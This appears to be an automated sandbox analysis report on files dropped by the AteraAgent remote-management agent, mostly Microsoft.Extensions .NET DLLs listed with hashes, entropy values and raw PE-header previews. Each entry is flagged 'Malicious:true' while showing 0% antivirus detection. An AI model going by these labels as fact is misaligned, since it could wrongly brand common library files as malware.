                                                                                                                                                                                                                                        SSDEEP:3072:ChOh6zHpz7YSkfd6kUYm4wlb6QAGcbLQpgjOHopZb7UsUDfAbmn1F8mkmBC:ChJ177+9jQAVph4sUDfAbm1F8MC
                                                                                                                                                                                                                                        MD5:6DDA20C58ED67382D0B5D7A17FAF6A4A
                                                                                                                                                                                                                                        SHA1:5C39B32EDAA98E70BF01DACE2C59D6EC304F8DD1
                                                                                                                                                                                                                                        SHA-256:43EFFADADAA2FD01EE7DB52BFEC67F9A1E9E2F8FC276B4EC244BB24B854315BB
                                                                                                                                                                                                                                        SHA-512:8984AFB415FC19ABB4358455DE47FD4FB3EE75F005772AF4204508F1DB47B21E93EAAC7410FB5001BC59F922A5489599FAFCBF589B6DCBD891C9686C8BF46B71
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............:.... ........... ....................... .......:....`.....................................O.......$...............P(..............p............................................ ............... ..H............text...@.... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................H.......0.................................................................(9...*^.(9..........%...}....*:.(9.....}....*:.(9.....}....*:.(9.....}....*....0..G.........(:...}q......}r......}s......}t......}p.....|q.....(...+..|q...(<...*..0..G.........(:...}x......}y......}z......}{......}w.....|x.....(...+..|x...(<...*..0..G.........(=...}c......}d......}e......}f......}b.....|c.....(...+..|c...(?...*..0..G.........(=...}k......}l......}m......}n......}j.....|k.....(...+..|k..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29264
                                                                                                                                                                                                                                        Entropy (8bit):6.524120604887875
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:9+q+2Vv/+usFlLVyKo/9ETG/DwzzRjz69M1ZVMdWs6NWsaaNyb8E9VF6IYinAM+R:9+EF/CvyKohrqnDEpYinAMxCtz
                                                                                                                                                                                                                                        MD5:8A86E5FF5D774C00992E276CFACECF80
                                                                                                                                                                                                                                        SHA1:F19FD07AE29B32579E75A0E4E738EF878835A037
                                                                                                                                                                                                                                        SHA-256:BB6667D93A1258A76DF2C007083A1E7CC000BB5BEA3195544EAC733C6259A540
                                                                                                                                                                                                                                        SHA-512:B35960BB4908F05602D375AD24316E293B05FEC90A6E366D32F3CA7CA37BDBE0158F572EAA7BB8C6C387691DAA2AE213258603E4658BA99767FDC0D9BE4E5972
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N............." ..0..>...........\... ...`....... ...............................d....`.................................{\..O....`...............J..P(..........d[..T............................................ ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............H..............@..B.................\......H........(...............W..X....Z........................................(&...*^.(&......8...%...}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*:.(&.....}....**.-..(....*..s'...z.~....*...0..........(....,..*..(.....o(......&...*...................0...........(.......()...-..,..*.*.(....,.r...p......%...%...(*...*..(+...*.(....,.r...p......%...%...%...(*...*...(,...*.(....,!r...p......%...%...%...%...(*...*....(-...*..,&(....,..r...pr...p.(*...(....*..(/...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):42576
                                                                                                                                                                                                                                        Entropy (8bit):6.408969180714612
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:uThLeDjUB16TI1CQ12cMcFgL/l5d4EpYinAMxCB:uTvB71dEcME45dB7Hxy
                                                                                                                                                                                                                                        MD5:071B50004B2ABE329A964ECD09A7E896
                                                                                                                                                                                                                                        SHA1:08D2A3056856235113C43CA3FA27D47C759F7EB6
                                                                                                                                                                                                                                        SHA-256:E8C446C1ACC2E0BC2DC9A80E286456B9A84B5DB5B1D4101C612BBFBD331EE0A9
                                                                                                                                                                                                                                        SHA-512:6608AA59D25BB19F7B34717083C8BD60CFAFD299D982445BC491C12E265C9BDFE92A23CCE45074583184C6F2A128CD2646EF05DF59FC82C7B5CF4D8F3046E19E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f............" ..0..t.............. ........... ....................................`.....................................O....................~..P(..........|...T............................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H.......4:...L.............8.............................................(....*^.(.......A...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...( ...*..(!...*.(....,.r...p......%...%...%...( ...*...("...*.(....,!r...p......%...%...%...%...( ...*....(#...*..,&(....,..r...pr...p.( ...($...*..(%...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25168
                                                                                                                                                                                                                                        Entropy (8bit):6.670940956884048
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wYEMITBweJkneGO3WKGW9anWsVNyb8E9VF6IYinAM+oCOScXu:2TBwa7dEtxEpYinAMxC+u
                                                                                                                                                                                                                                        MD5:D950E5EC874F7C62306B93500FD36BBA
                                                                                                                                                                                                                                        SHA1:530F5F348CE9B50C396629A16F6F815F2495722F
                                                                                                                                                                                                                                        SHA-256:416CCF9CDAB49BB9DC2B4259E0D5B4434540AC82C1BC166F85D3CBD9F8942D4D
                                                                                                                                                                                                                                        SHA-512:B374D9A55A99603CD623D0876CEB8235FC235A09C8DA9BD0FEF9AFB2EA11574811E9073AFAF6DB56697AA3E75546BC61F029384404544D0299046EF239406E96
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1............" ..0..0...........O... ...`....... ....................................`..................................O..O....`...............:..P(..........xN..T............................................ ............... ..H............text..../... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................O......H.......d&...#..........hI.......M........................................(....*^.(.......-...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....( ...*..,&(....,..r...pr...p.(....(!...*..("...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21584
                                                                                                                                                                                                                                        Entropy (8bit):6.717352450932083
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N6jxRm3soGTeZeszQm31WUKeWsJNyb8E9VF6IYinAM+oCen75ikD:Mj23spTeZposNEpYinAMxC7kD
                                                                                                                                                                                                                                        MD5:C2177320BC76C026D8C554D8CFEC1F2F
                                                                                                                                                                                                                                        SHA1:A208DC6AE7A5FE8FBAF5F5FDAC980B0360A667EC
                                                                                                                                                                                                                                        SHA-256:F971952E34D3BFA8263D8B5FD7F4F251B9D8C969E3EC2325AF0A3BFFD43DC946
                                                                                                                                                                                                                                        SHA-512:39A7258DF35A89A6A9B68220CA0AD159839739F8EC6DF987EE7C53CEBC2B55C44A3FD81718F620B45B14EB6AF2075A1AD5DDFA895CF34B71A0947B1BEF7CE389
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s............" ..0.."..........NA... ...`....... ............................... ....`..................................@..O....`...............,..P(...........?..T............................................ ............... ..H............text...T!... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B................/A......H.......x#......................T?........................................(....*^.(.......$...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*:.s....o....&.*V.s....%.o....o....&.*"..(...+*v.(.....~....}.....~....}....*..(......%-.&~....}......{....(....}....*2.(....(....*..(....o....r...p.{....r...p(....*..0..........(....s......o.....8.....o .......(!...t&.....o .

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):28240
                                                                                                                                                                                                                                        Entropy (8bit):6.602224449204335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:pzp434gr92+liFe/5XjtCZ0UaFoSc43IXABPpBzWq66WstNyb8E9VF6IYinAM+ox:5xk1/9jtGhScRwPpByoJEpYinAMxC8LX
                                                                                                                                                                                                                                        MD5:A9BB401E3DE7FB6FC038DC6BDC27591B
                                                                                                                                                                                                                                        SHA1:CB1CC3D6E4A603C1B25350D5E5581193A80D3D9C
                                                                                                                                                                                                                                        SHA-256:1B15C473C30E52A08ABDA9FFF9099E5A51EB8DB5733A7EFA29FCCEA2C17BDB6A
                                                                                                                                                                                                                                        SHA-512:EB5C0910134420FB6717039FD95CC819C24FA0F3288A83DD43363CFD902D3FD39686B3E0D74D29B0604DD771D7215DFF2EE39713D49A760E2113B86CF98BBAAC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."..........." ..0..<...........[... ...`....... ....................................`..................................[..O....`...............F..P(..........tZ..T............................................ ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............D..............@..B.................[......H........(...,...........U..8....Y........................................(....*^.(.......3...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...( ...*.(....,!r...p......%...%...%...%...(....*....(!...*..,&(....,..r...pr...p.(....("...*..(#...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27728
                                                                                                                                                                                                                                        Entropy (8bit):6.567134242779113
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SXLAulT7JkcAoWovkT7jF6zOFz3Ge1l68mWka2WsCNyb8E9VF6IYinAM+oCltvGw:mLAux7yUcT7jF6aYhSkCEpYinAMxCv
                                                                                                                                                                                                                                        MD5:97C4011B8FC681C68FC0D9A0AFE05134
                                                                                                                                                                                                                                        SHA1:E3C5A7264874ADAF421303D679637C35DC3A1EBB
                                                                                                                                                                                                                                        SHA-256:B9FA3DFD672088A280B1B6AFB38E9539B195B85D8351F6753D064D10F23A8617
                                                                                                                                                                                                                                        SHA-512:70CA32792A0FB2325BC511FA1A298D1D03AA7D8E72B6F1F05443C0FE2D8B01521A745F4F1C8D7CE1FC27E6AEE112E8C499B2FF79C885BADC774EDD942C732906
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..:...........X... ...`....... ....................................`.................................SX..O....`..l............D..P(..........LW..T............................................ ............... ..H............text....8... ...:.................. ..`.rsrc...l....`.......<..............@..@.reloc...............B..............@..B.................X......H........(...)...........Q.......V........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*..............!....0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..( ...*.(....,.r...p......%...%...%...(....*...(!...*.(....,!r...p......%...%...%...%...(....*....("...*..,&(....,..r...pr...p.(....(#...*..($...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26192
                                                                                                                                                                                                                                        Entropy (8bit):6.549189808431148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:pMvnbB39p5YGTv9uuM1iFSF3yE1LlW9KCWs7Nyb8E9VF6IYinAM+oCUYO39:pKnbPplTv9uuLuVwXEpYinAMxCq39
                                                                                                                                                                                                                                        MD5:7D44B25B42F8273E1B95DB0D73671E84
                                                                                                                                                                                                                                        SHA1:265714D11A304A27443F9DBAFB33A2987C5AF845
                                                                                                                                                                                                                                        SHA-256:823154871F155DDCCB8DBE9DCC3078263A6C296D32524564E90B106930992987
                                                                                                                                                                                                                                        SHA-512:563E7DB622C13C19BA81E5C123C812A8FBEB4D50C6BB2A1686C728180A26CC246D369B1BB5B8536D28A2105CA9D8DA7C8108AE3EBE302CC180EF29BFA5C8B3A2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.<..........." ..0..4..........bR... ...`....... ..............................~.....`..................................R..O....`...............>..P(...........P..T............................................ ............... ..H............text...h2... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B................AR......H........&..$$..........(J..P...xP........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....( ...*..,&(....,..r...pr...p.(....(!...*..("...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41040
                                                                                                                                                                                                                                        Entropy (8bit):6.41098819814607
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:e054t3ibki5TCk3jqEr0WBum6JEpYinAMxCmd:ePtnUj/Lkmp7HxZd
                                                                                                                                                                                                                                        MD5:CA14EEE1F7605296B50D9471B3846A1A
                                                                                                                                                                                                                                        SHA1:E26129A1044FA6A4A85A8890D3569C3900E338D2
                                                                                                                                                                                                                                        SHA-256:F7CAB383114EDE19662B14EFADEAD8E76FE59954DE5464BA64E270587D738206
                                                                                                                                                                                                                                        SHA-512:8EF77602DD6D4F86E3607A287F8E07567B216D73FA442FD7B9165B1087D2712817FAB690107EC23929EB519560CFAC897FE6C794B941A6E69CEE6D3CF661DE63
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...mq..........." ..0..n............... ........... ...............................B....`.................................a...O....................x..P(..........d...T............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H.......p8...M...........................................................(#...*^.(#......A...%...}....*:.(#.....}....*:.(#.....}....*:.(#.....}....*:.(#.....}....**.-..(....*..s$...z.~....*...0..........(....,..*..(.....o%......&...*...................0...........(.......(&...-..,..*.*.(....,.r...p......%...%...('...*..((...*.(....,.r...p......%...%...%...('...*...()...*.(....,!r...p......%...%...%...%...('...*....(*...*..,&(....,..r...pr...p.('...(+...*..(,...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):45136
                                                                                                                                                                                                                                        Entropy (8bit):6.259777287029036
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Kq+RszBJV7CkN9YxrIvw2DLBjYAQP0+lyJ9PPAEpYinAMxCsi+x:Kq+SSkNNjdQc+cJNh7HxJiy
                                                                                                                                                                                                                                        MD5:0E56D17A0B873639366047CE26A5E063
                                                                                                                                                                                                                                        SHA1:491A1C758D27BBA08ACF9CFC87468988545835F0
                                                                                                                                                                                                                                        SHA-256:559CDE153D2C725745796BE20B7FE5C197DBAFBFBC3A2D4C44CC025DD75AF8ED
                                                                                                                                                                                                                                        SHA-512:A026E4CA433846D0DC3FB53826770DB45C8D765B1705D6C0DF45991440809AF2134F8608E2E0DCABBBD539049E72DA701F2951337B6CFB3ADDE43A72A739A578
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r=..........." ..0..|............... ........... ....................................`....................................O.......................P(..............T............................................ ............... ..H............text....{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......<=...U..........P....... .........................................(!...*^.(!......E...%...}....*:.(!.....}....*:.(!.....}....*:.(!.....}....*:.(!.....}....**.-..(....*..s"...z.~....*...0..........(....,..*..(.....o#......&...*...................0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):85072
                                                                                                                                                                                                                                        Entropy (8bit):6.2673588925221
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:nNNgvCsvGPrpqSMo4Z9M4IIWSYe2Kbj5u6fjQ+7PMMcmnJz7Hxfp:nMCsvGPPed5ZfjQ+rBvJzFp
                                                                                                                                                                                                                                        MD5:68E188489CD2966EF4B9E8864B5236ED
                                                                                                                                                                                                                                        SHA1:23A5FEA5C4787804CF140741AA35F7CC55229977
                                                                                                                                                                                                                                        SHA-256:97BA41B72AE55EA3FC47A6D48769638F608F8AD498A0A81E4780C42C45F34BC5
                                                                                                                                                                                                                                        SHA-512:C14EACFA5ACCAFE998FD55868A91FAFDB3A23031A6DBECCCD76ADAE1E4F43C414C6C3AEBA4D4F4FEF04E0FCA8CB6B7F08017937E353522775924F1992377235A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.)..........." ..0.............28... ...@....... ....................................`..................................7..O....@...............$..P(...`.......6..T............................................ ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................8......H.......lj..............$%..0...T6........................................(&...*^.(&......s...%...}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*.~....*..0..........(....,..*..(.....o'......&...*...................0...........(.......((...-..,..*.*.(....,.r...p......%...%...()...*..(*...*.(....,.r...p......%...%...%...()...*...(+...*.(....,!r...p......%...%...%...%...()...*....(,...*..,&(....,..r...pr...p.()...(-...*..(....*.*.(....,.r...p......%...%...()..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23632
                                                                                                                                                                                                                                        Entropy (8bit):6.618432341469682
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:OVAko1Z0S/oj6ETt9EQMVSz3PMA2oWs6hWso4Nyb8E9VF6IYinAM+oCqJ2qui:O3m0SM3Tt90Pl7fEpYinAMxCa3x
                                                                                                                                                                                                                                        MD5:AC95850E08238CF3A6FFC51D47BCC1DB
                                                                                                                                                                                                                                        SHA1:06CC0E13887DC0030A0DFFE067E01BE77D75CF4B
                                                                                                                                                                                                                                        SHA-256:B788F714E91102C2D34FF5E20A07F7408E9EF74343871942E5889612EBBE70A5
                                                                                                                                                                                                                                        SHA-512:58B35DA53926365A3502BCDE514E34C3159EC5DF7672527C884FF5057FF1089F0124EE79F66EA79E6004DF4CD14805C4495C43AC0C38AA07851303F3FAFADF15
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............" ..0..(...........G... ...`....... ....................................`..................................G..O....`...............4..P(...........F..T............................................ ............... ..H............text....'... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............2..............@..B.................G......H........$...............B..@....F........................................(....*^.(.......(...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):45136
                                                                                                                                                                                                                                        Entropy (8bit):6.430057016218873
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:FxddbVKFC/2DfTMFeuzpdUTVoIEu3GzN/EpYinAMxCMe:FNxxAYFeMpdURZEu3S+7HxZe
                                                                                                                                                                                                                                        MD5:123D79B76609A0E1B4E7977FF4283822
                                                                                                                                                                                                                                        SHA1:E4F25CDDCF76FFB2569D22D2090D32B33A98512B
                                                                                                                                                                                                                                        SHA-256:871B2C2230BF4079699D34AFD6A262B7FF362431D7B2A0F4C3539A6F7D1C267C
                                                                                                                                                                                                                                        SHA-512:C4EF8889F3DED86FBDE77EFB0A017B14F6888984F0F9A7B12FCC6CD782816B78878B0F853EF2BCF0A18F6C7966D8E495B62CF11B8EBDDBA94440FFA2F2A51AF6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s..........." ..0..~..........&.... ........... ..............................k.....`....................................O.......p...............P(.............T............................................ ............... ..H............text...,|... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........;..(Y..................D.........................................("...*^.("......V...%...}....*:.(".....}....*:.(".....}....*:.(".....}....*:.(".....}....**.-..(....*..s#...z.~....*...0..........(....,..*..(.....o$......&...*.............. ....0...........(.......(%...-..,..*.*.(....,.r...p......%...%...(&...*..('...*.(....,.r...p......%...%...%...(&...*...((...*.(....,!r...p......%...%...%...%...(&...*....()...*..,&(....,..r...pr...p.(&...(*...*..(+...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):47184
                                                                                                                                                                                                                                        Entropy (8bit):6.373451878905772
